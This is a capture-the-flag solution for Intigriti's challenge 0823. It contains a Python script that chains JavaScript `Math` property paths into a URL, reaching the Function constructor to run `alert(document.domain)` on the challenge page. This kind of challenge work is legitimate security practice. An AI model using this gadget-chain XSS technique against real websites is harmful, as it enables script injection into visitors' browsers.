intigriti / Challenge 0823 by huli

intigriti / Challenge 0823 by huli

My solution

$ python exploit.py

https://challenge-0823.intigriti.io/challenge/index.html?q=Math.E.valueOf,Math.sign,Math.log,Math.seeds.splice,Math.E.valueOf,Math.sign,Math.trunc.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.ceil.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.atan.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.random.name.sub.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.trunc.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.constructor.entries.name.at,Math.seeds.push,Math.random.name.normalize.name.length.valueOf,Math.random.name.constructor.fromCharCode,Math.seeds.push,Math.E.valueOf,Math.sign,Math.floor.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.round.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.acos.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.max.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.atan.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.sin.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.round.name.at,Math.seeds.push,Math.E.valueOf,Math.sign,Math.constructor.entries.name.at,Math.seeds.push,Math.random.name.valueOf,Math.seeds.join,Math.random.constructor,Math.seeds.reduce,Math.constructor.values,Math.seeds.sort.apply,Math.seeds.reverse.apply,Math.seeds.join.bind,Math.seeds.unshift,Math.E.valueOf,Math.sign,Math.seeds.splice,Math.random.name.valueOf,Math.seeds.unshift,Math.random.name.valueOf,Math.seeds.unshift,Math.seeds.pop,Math.seeds.reduce,Math.seeds.constructor.from,Math.seeds.reverse.apply,Math.seeds.join.bind,Math.seeds.reduce,Math.random.constructor,Math.seeds.reduce#//)niamod.tnemucod(trela

# Challenge page that receives the generated `q` query parameter.
BASE_URL = "https://challenge-0823.intigriti.io/challenge/index.html"

# JavaScript proof-of-concept statement; it is placed, reversed, in the URL
# fragment when the final URL is printed.
XSS_PAYLOAD = "alert(document.domain)"
def make_zero() -> list[str]:
    """Return the property-path steps that produce the number 0.

    In JavaScript terms: Math.E.valueOf() is e, Math.sign(e) is 1 and
    Math.log(1) is 0.
    NOTE(review): assumes the challenge page feeds each step's result into the
    next step; the page's evaluator is not shown here, confirm against it.

    Returns:
        A new list on every call, so callers may extend it freely.
    """
    steps = ["Math.E.valueOf", "Math.sign"]
    steps.append("Math.log")
    return steps
def make_one() -> list[str]:
    """Return the property-path steps that produce the number 1.

    In JavaScript terms: Math.E.valueOf() is e and Math.sign(e) is 1.
    NOTE(review): assumes the challenge page feeds each step's result into the
    next step; the page's evaluator is not shown here, confirm against it.

    Returns:
        A new list on every call, so callers may extend it freely.
    """
    steps = list(("Math.E.valueOf", "Math.sign"))
    return steps
def clear_seeds() -> list[str]:
    """Return the steps that empty the `Math.seeds` array.

    The steps compute 0 (see make_zero) and end with `Math.seeds.splice`;
    per the script's own trace the array is `[]` afterwards.

    Returns:
        A new list of property-path strings.
    """
    steps = make_zero()  # fresh list, safe to extend in place
    steps.append("Math.seeds.splice")
    return steps
# Maps each character the script needs to the steps that produce it.
#
# Letters are read out of built-in function names: the index (0 via make_zero,
# 1 via make_one) is computed first and then handed to `<name>.at`, e.g.
# index 1 of "max" is "a" and index 0 of "min" is "m".
# NOTE(review): assumes the challenge page passes each step's result to the
# next step; the evaluator itself is not shown here.
char_to_list = {
    ch: index_steps() + [name_at]
    for ch, index_steps, name_at in [
        ("a", make_one, "Math.max.name.at"),
        ("c", make_one, "Math.acos.name.at"),
        ("d", make_zero, "Math.constructor.defineProperty.name.at"),
        ("e", make_one, "Math.ceil.name.at"),
        ("g", make_zero, "Math.constructor.getPrototypeOf.name.at"),
        ("h", make_zero, "Math.hypot.name.at"),
        ("i", make_one, "Math.sin.name.at"),
        ("l", make_one, "Math.floor.name.at"),
        ("m", make_zero, "Math.min.name.at"),
        ("n", make_one, "Math.constructor.entries.name.at"),
        ("o", make_one, "Math.round.name.at"),
        ("q", make_one, "Math.sqrt.name.at"),
        ("r", make_one, "Math.trunc.name.at"),
        ("s", make_zero, "Math.sin.name.at"),
        ("t", make_one, "Math.atan.name.at"),
        ("u", make_one, "Math.random.name.sub.name.at"),
        ("v", make_zero, "Math.constructor.values.name.at"),
    ]
}

# Whitespace comes from character codes instead: the length of a method name
# ("normalize" has 9 letters, "replaceAll" has 10) goes to String.fromCharCode.
char_to_list.update(
    {
        "\t": [
            "Math.random.name.normalize.name.length.valueOf",
            "Math.random.name.constructor.fromCharCode",
        ],
        "\n": [
            "Math.random.name.replaceAll.name.length.valueOf",
            "Math.random.name.constructor.fromCharCode",
        ],
    }
)
# Assemble the comma-separated step list for the `q` parameter and print the
# final URL. The state comments restate the author's own trace of `Math.seeds`.
#
# NOTE(review): the last step compiles text taken from the URL fragment through
# the Function constructor, which is reached via `.constructor` on a `Math`
# member. A Content-Security-Policy without 'unsafe-eval' blocks that kind of
# string-to-code compilation, and a path filter that refuses `constructor`
# would stop the chain earlier. The challenge's own filter is not shown here,
# so confirm against its source.
qs = clear_seeds()
# Math.seeds === []

func_body = "return\tlocation"
for ch in func_body:
    qs.extend(char_to_list[ch])
    qs.append("Math.seeds.push")
# Math.seeds === ["r", "e", "t", ..., "n"]

# `Math.random.name.valueOf` serves as the join separator; the trace further
# down shows it evaluating to "".
qs.append("Math.random.name.valueOf")
qs.append("Math.seeds.join")
# -> "return\tlocation"

qs.extend(
    [
        "Math.random.constructor",
        "Math.seeds.reduce",
    ]
)
# -> Function("return\tlocation")

qs.extend(
    [
        "Math.constructor.values",
        "Math.seeds.sort.apply",
        "Math.seeds.reverse.apply",
        "Math.seeds.join.bind",
        "Math.seeds.unshift",
    ]
)
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse()), "r", "e", "t", ..., "n"]

qs.extend(make_one())
qs.append("Math.seeds.splice")
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse())]

qs.extend(
    [
        "Math.random.name.valueOf",
        "Math.seeds.unshift",
        "Math.random.name.valueOf",
        "Math.seeds.unshift",
    ]
)
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse())]

qs.extend(
    [
        "Math.seeds.pop",
        "Math.seeds.reduce",
    ]
)
# -> Object.values(location).sort().reverse().join("", "")
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse())]

qs.extend(
    [
        "Math.seeds.constructor.from",
        "Math.seeds.reverse.apply",
        "Math.seeds.join.bind",
        "Math.seeds.reduce",
    ]
)
# -> "alert(document.domain)//#..."

qs.extend(
    [
        "Math.random.constructor",
        "Math.seeds.reduce",
    ]
)
# -> Function("alert(document.domain)//#...")("", "")

# presumably the challenge caps the number of steps; verify against its source
assert len(qs) < 100, len(qs)

# The fragment carries the payload plus a trailing "//", written backwards.
query = ",".join(qs)
fragment = (XSS_PAYLOAD + "//")[::-1]
print(f"{BASE_URL}?q={query}#{fragment}")
# Per the author, opening the printed URL executes `alert(document.domain)`.